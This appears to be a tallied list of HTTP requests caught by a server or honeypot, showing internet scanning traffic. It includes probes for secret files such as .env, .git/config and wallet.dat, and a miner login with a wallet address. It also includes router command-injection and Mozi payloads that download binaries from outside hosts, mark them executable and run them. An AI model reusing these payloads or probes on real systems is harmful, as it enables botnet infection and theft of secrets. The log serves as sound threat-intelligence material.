1 {\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"44cbWk3V34xXkgZh8V75ghGbbBYf2v25mWMNg4JV7GRghN3rBEnhrpDSCikpraL6mSYRF1SZFm69N4sg2QRtSYZL4EutwYg\",\"pass\":\"x\"}}
1 CONNECT example[.]com:80 HTTP/1.1
5 CONNECT google[.]com:443 HTTP/1.1
1 GET /.bash_history HTTP/1.0
1 GET /.bitcoin/wallet.dat HTTP/1.0
1 GET /.env.prod HTTP/1.0
1 GET /.env_ci HTTP/1.0
19 GET /.env HTTP/1.1
1 GET /.env HTTP/1.0
1 GET /.environ HTTP/1.0
1 GET /.git/config HTTP/1.1
1 GET /.history HTTP/1.0
1 GET /.most/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1
1 GET /.zsh_history HTTP/1.0
1 GET //MyAdmin/scripts/setup.php HTTP/1.1
1 GET //myadmin/scripts/setup.php HTTP/1.1
1 GET //phpMyAdmin/scripts/setup.php HTTP/1.1
1 GET //phpmyadmin/scripts/setup.php HTTP/1.1
1 GET //pma/scripts/setup.php HTTP/1.1
1 GET /0bef HTTP/1.0
2 GET /1.php HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /DdEp HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /aab8 HTTP/1.1
1 GET /aab9 HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /actuator/health HTTP/1.1
2 GET /bundle.js HTTP/1.1
2 GET /cdn-cgi/trace HTTP/1.1
1 GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1
1 GET /cgi-bin/authLogin.cgi HTTP/1.1
2 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38[.]45[.]200[.]163%2Farm+%3B+chmod+777+arm%3B+.%2Farm+tplink%3B+rm+-rf+arm) HTTP/1.1
3 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94[.]156[.]79[.]193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1
3 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>cd+/tmp;+rm+-rf+shk;+wget+http[:]//103[.]14[.]226[.]142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1
1 GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1
1 GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1
1 GET /druid/index.html HTTP/1.1
1 GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1
1 GET /evox/about HTTP/1.1
1 GET /ext-js/app/common/zld_product_spec.js HTTP/1.1
6 GET /favicon.ico HTTP/1.1
2 GET /files/ HTTP/1.1
2 GET /form.html HTTP/1.1
2 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /hudson HTTP/1.1
2 GET /info.php HTTP/1.1
1 GET /jquery-3.3.1.slim.min.js HTTP/1.1
1 GET /jquery-3.3.2.slim.min.js HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /muieblackcat HTTP/1.1
1 GET /odinhttpcall1714752322 HTTP/1.1
1 GET /owa/auth/x.js HTTP/1.1
2 GET /password.php HTTP/1.1
1 GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//125[.]26[.]180[.]114:49342/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1
1 GET /solr/admin/info/system HTTP/1.1
2 GET /systembc/password.php HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
2 GET /upl.php HTTP/1.1
1 GET /v2/_catalog HTTP/1.1
1 GET /wallet.dat HTTP/1.0
1 GET /webui/ HTTP/1.1
1 GET /wsman HTTP/1.1
1 GET /x8ZR HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /sdk HTTP/1.1
1 PRI * HTTP/2.0